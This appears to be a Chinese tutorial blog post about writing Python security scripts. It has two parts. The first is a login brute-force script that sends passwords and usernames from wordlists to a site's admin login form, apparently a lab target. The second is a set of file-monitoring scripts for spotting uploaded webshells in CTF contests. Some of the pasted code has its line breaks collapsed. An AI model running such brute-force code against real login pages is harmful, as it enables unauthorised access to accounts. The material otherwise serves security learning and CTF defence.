Python从0到POC编写--实用小脚本02

爆破脚本:

爆破脚本也是我们经常使用的东西

这里就简单讲讲后台爆破脚本的编写吧

在编写之前,我们先通过访问网站去看看情况

首先我们可以先登录看看

输入账号 admin ,密码 12345 后

登录失败,提示 用户名或密码错误

images


在输入正确的密码 123456 后,则会跳到用户界面

然后我们可以通过这个信息去判断是否登录成功

images


现在我们有了登录密码,有了判断是否登录成功的信息

还有就是如何构造 post 包

我们可以先用 burp 抓一下看看

现在我们可以看到,这些数据发送到了 /user/logCheck.php 的页面,

很明显这是判断用户名和密码的,

POST 数据为 user=admin&pass=123456&submit=login

images


有了这些信息,就可以写脚本了,

脚本其实跟前面的一些类似,无非就是判断不同

直接来看代码

假设我们知道用户名为 admin ,

那么我们可以直接爆破密码,

使用 format() 函数把密码传进去


# -*- coding: utf-8 -*-import requests
import time
import redef login(pwd):try:headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"}url = "http://www.vd.com/user/logCheck.php"login = {"user":"admin","pass":"{}".format(pwd),"submit":"login"}r = requests.post(url,headers=headers,data=login)r.encoding = 'utf-8'if '用户名或密码错误' in r.text:print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")else:print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")except:print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")password = open('D:/top100.txt','r')for pwd in password.readlines():pwd = pwd.strip('\n')login(pwd)username.close()

下面是运行结果

images


假设用户名也不知道,那么我们也可以连用户名也一起爆破,

给用户名也加一个 format() 就行了

下面是代码

使用 for 循环来传入用户名和密码进行爆破


import requests
import time
import redef login(user,pwd):try:headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"}url = "http://www.vd.com/user/logCheck.php"login = {"user":"{}".format(user),"pass":"{}".format(pwd),"submit":"login"}r = requests.post(url,headers=headers,data=login)r.encoding = 'utf-8'if '用户名或密码错误' in r.text:print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")else:print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")except:print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")username = open('D:/user.txt','r')for user in username.readlines():user = user.strip('\n')password = open('D:/top100.txt','r')for pwd in password.readlines():pwd = pwd.strip('\n')login(user,pwd)username.close()
password.close()

运行结果

验证完 admin 就验证 root

images


文件监控:

在ctf线下赛中,经常会遇到文件上传漏洞,

那么在我们不会修复漏洞的情况下,就会被挂马 getshell了,

然而我们即使知道上传的文件在哪里,

那么也不可能一直守着那个文件夹删除文件,

你删除也没有别人的脚本操作快,你删除时别人已经 getflag 了,

在这种情况下,我们就需要一个文件监控脚本来帮助我们去完成这个操作。


编写思路:

先获取原文件夹里的文件,做一个白名单,

然后监控是否有新增文件


方法一:

先来看看代码,编写思路是这样子的,

将要监控的文件夹复制到其他地方,当作一个白名单,

然后重复比对这两个文件夹里面的内容,

如果在白名单上没有的,那么就是新增的文件,

下面是一个纯监控脚本,如需要后续操作,比如删除,可自行添加


import os
import shutil
import timedef backup(path1,path2):global file_listif os.path.isdir(path2):  # 判断白名单文件夹是否存在file_list = os.listdir(path2)   # 白名单文件else:shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单file_list = os.listdir(path2)  # 白名单文件def checkfile(file_list):while 1:check_file = os.listdir(path1)  # 要监控的文件夹tmp = [file for file in check_file if not file in file_list] # 列表推导式,获取差集if tmp: # 判断是否有新增文件for file in tmp:print('发现新文件 -----> ' + file)file_list.append(str(file))       # 避免重复输出else:pass# print(tmp)time.sleep(3)  # 每3秒循环一次if __name__ == '__main__':path1 = 'D:/123'  # 要监控的文件夹,123为文件夹名字path2 = 'E:/123'  # 白名单路径,123为文件夹名字backup(path1,path2)checkfile(file_list)

最后效果就是这样子的

images


除了列表推导式,我们还可以用其他方法获取差集,

那就是使用 difference() 函数,

这种方式比列表推导式更高效

代码其实都差不多,这里就不做更多的介绍了


import os
import shutil
import timedef backup(path1,path2):global file_listif os.path.isdir(path2):  # 判断白名单文件夹是否存在file_list = os.listdir(path2)   # 白名单文件else:shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单file_list = os.listdir(path2)  # 白名单文件def checkfile(file_list):while 1:check_file = os.listdir(path1)  # 要监控的文件夹tmp = list(set(check_file).difference(set(file_list))) # 获取差集,check_file 中有,而 file_list 中没有if tmp: # 判断是否有新增文件for file in tmp:print('发现新文件 -----> ' + file)file_list.append(str(file))       # 避免重复输出else:pass# print(tmp)time.sleep(3)  # 每3秒循环一次if __name__ == '__main__':path1 = 'D:/123'  # 要监控的文件夹,123为文件夹名字path2 = 'E:/123'  # 白名单路径,123为文件夹名字backup(path1,path2)checkfile(file_list)

方法二:

方法一中复制文件夹到其他地方的方式颇为笨重 ,

如果要监控的目录文件非常多,那么就会非常不方便

下面这个方法,不需要复制文件夹也能实现监控效果,

在脚本第一次运行的时候获取一个初始文件列表 file_list

然后在第二次以及后面的运行中获取的文件作为 check_dir

然后再判断两个列表中是否有不相同的文件存在

脚本运行后,你往文件夹丢文件就能看到效果了,脚本默认是 3 秒检测一次。


import os
import timedef list_dir(filepath):global file_list	file_list = os.listdir(filepath)  # 获取初始文件列表,作为白名单def checkfile(filepath):while 1:check_dir = os.listdir(filepath)  # 获取路径下的文件for file in check_dir:if str(file) not in str(file_list):print('发现新文件 -----> ' + file)file_list.append(str(file))else:passtime.sleep(3)  # 3秒循环一次if __name__ == '__main__':filepath = 'D:/123'    # 要监控的目录路径,D盘下的123文件夹list_dir(filepath)checkfile(filepath)

效果呢,也是一样的

images


总结:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/323297.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

苹果新品发布会速览:iPad革新遇市场挑战 | 百能云芯

北京时间5月7日晚,苹果以“放飞吧”为主题,举办了一场不到40分钟的线上新品发布会。在这场发布会上,iPad产品线成为了焦点,M4芯片和OLED技术的融入更是引起了广泛关注。 iPad新篇章:技术革新与市场竞争 时隔18个月&…

WebSocket 多屏同显和异显

介绍 多屏同显:通过在一个应用上进行操作之后,另一个应用也能跟着一起发生改变,例如app1播放了晴天这首音乐,那么app2也要同步播放这首音乐,确保所有屏幕显示的内容完全相同。多屏异显:每个屏幕可以显示不同的内容,或者在内容更新时存在一定的延迟,而不需要严格保持同步…

Linux下的SPI通信

SPI通信 一. 1.SPI简介: SPI 是一种高速,全双工,同步串行总线。 SPI 有主从俩种模式通常由一个主设备和一个或者多个从设备组从。SPI不支持多主机。 SPI通信至少需要四根线,分别是 MISO(主设备数据输入,从设备输出),MOSI (主设数据输出从设备输入),SCLK(时钟信号),CS/SS…

物理层——计算机网络学习笔记二

目录 物理层的基本概念 数据通信的基础知识 物理层下面的传输媒体 信道复用技术 图片大部分来源于谢希仁《计算机网络》教材配套的ppt。 这一样都是介绍一下概念性的东西,了解一下就行,就重要性而言不如后面的内容。 物理层的作用:考虑如何才…

android基础-服务

同样使用intent来传递服务 oncreate是服务第一次启动调用,onStartCommand是服务每次启动的时候调用,也就是说服务只要启动后就不会调用oncreate方法了。可以在myservice中的任何位置调用stopself方法让服务停止下来。 服务生命周期 前台服务类似于通知会…

在Linux操作系统中扩建swap容量

在Linux操作系统上创建硬盘分区不仅可以储存数据,还可以使用创建的硬盘分区去扩展机器上swap分区的大小——去扩展交换工具的容量。 有些软件对于swap分区的大小是有要求的,swap分区的大小小于多少就安装不上软件。 要扩展swap容量要么重装系统&#x…

初学者理解Transformer,本文is all you need

要问现在AI领域哪个概念最热,必然是openAI推出chatGPT之后引发的大模型。然而这项技术的起源,都来自一篇google公司员工的神作“Attention Is All You Need”——本文标题也是一种致敬^_^,目前已有近12万的引用(还在增长)。 在“Attention Is…

【教程】极简Python接入免费语音识别API

转载请注明出处:小锋学长生活大爆炸[xfxuezhagn.cn] 如果本文帮助到了你,请不吝给个[点赞、收藏、关注]哦~ 安装库: pip install SpeechRecognition 使用方法: import speech_recognition as srr sr.Recognizer() harvard sr…

C++:哈希表和unordered系列容器的封装

一、unordered系列关联式容器的介绍 在C98中,STL提供了底层为红黑树结构的一系列关联式容器,在查询时效率可达到log2N,即最差情况下需要比较红黑树的高度次,当树中的节点非常多时,查询效率也不理想。最好的查询是&…

索引失效情况

📝个人主页:五敷有你 🔥系列专栏:面经 ⛺️稳中求进,晒太阳 一、索引列上运算操作。 不要在索引列上进行运算操作,否则索引会失效。 在tb_user的phone列加上索引,然后进行条件查询&am…

Kafka从0到消费者开发

安装ZK Index of /zookeeper/zookeeper-3.9.2 下载安装包 一定要下载-bin的,不带bin的是源码,没有编译的,无法执行。-bin的才可以执行。 解压 tar -zxvf apache-zookeeper-3.9.2-bin.tar.gz 备份配置 cp zoo_sample.cfg zoo_sample.cfg-b…

调用 gradio 创建聊天网页报错(使用远程服务器)

文章目录 写在前面1、使用默认IP地址(失败)2、使用本地IP地址(失败)3、使用远程服务器IP地址(成功) 写在前面 我复现了github上的 llama-chinese 的工作 使用的是 llama2,环境配置是在远程服务…

指针的奥秘(二):指针与数组的联系+字符指针+二级指针+指针数组+《剑指offer》笔试题

指针 一.指针与数组的联系1.数组名的理解2.使用指针访问数组3.一维数组传参的本质 二.字符指针1.字符指针隐藏秘密2.常量字符串3.《剑指offer》笔试题 三.二级指针四.指针数组1.指针数组模拟二维数组 一.指针与数组的联系 1.数组名的理解 也许大部分人认为数组名就是一个名称&…

使用 PXE+Kickstart 批量网络自动装机

前言: 正常安装系统的话使用u盘一个一个安装会非常慢,所以批量安装的技术就出来了。 一、 概念 PXE (Preboot eXecute Environment,预启动执行环境)是由 Intel 公司开发的技术,可以让计算机通过网络来启动…

如何判断nat网络?如何内网穿透

大家都清楚,如果你想开车,就必须要给车上一个牌照,随着车辆越来越多,为了缓解拥堵,就需要摇号,随着摇号的人数越来越多,车牌对于想开车的人来说已经成为奢望。在如今的IPv4时代,我们…

生信分析进阶2 - 利用GC含量的Loess回归矫正reads数量

在NGS数据比对后,需要矫正GC偏好引起的reads数量误差可用loess回归算法,使用R语言对封装的loess算法实现。 在NIPT中,GC矫正对检测结果准确性非常重要,具体研究参考以下文章。 Noninvasive Prenatal Diagnosis of Fetal Trisomy…

如何把多个文件(夹)平均复制到多个文件夹中

首先,需要用到的这个工具: 度娘网盘 提取码:qwu2 蓝奏云 提取码:2r1z 假定的情况是,共有20个兔兔的图片,想要平均的复制4个文件夹里,那么每个文件夹里面就有5个图片 (如果是5个&a…

nginx自动部署-跨操作系统

项目里面有一个需求,就是需要用让nginx进程提供给系统管理一个start,stop和getPid方法,这样系统管理可以自动拉起来nginx,达到自动部署的目的。离线部署同样适用 这样一来,我就需要提供windows版本linux不同版本的nginx源码包&am…

Spring JdbcTemplate实现自定义动态sql拼接功能

需求描述: sql 需要能满足支持动态拼接,包含 查询字段、查询表、关联表、查询条件、关联表的查询条件、排序、分组、去重等 实现步骤: 1,创建表及导入测试数据 CREATE TABLE YES_DEV.T11 (ID BINARY_BIGINT NOT NULL,NAME VARCH…

【管理咨询宝藏93】大型制造集团数字化转型设计方案

【管理咨询宝藏93】大型制造集团数字化转型设计方案 【格式】PDF版本 【关键词】国际咨询公司、制造型企业转型、数字化转型 【核心观点】 - 235页大型制造型集团数字化转型方案设计!细节非常详尽,图表丰富! - 系统架构必须采用成熟、具有国…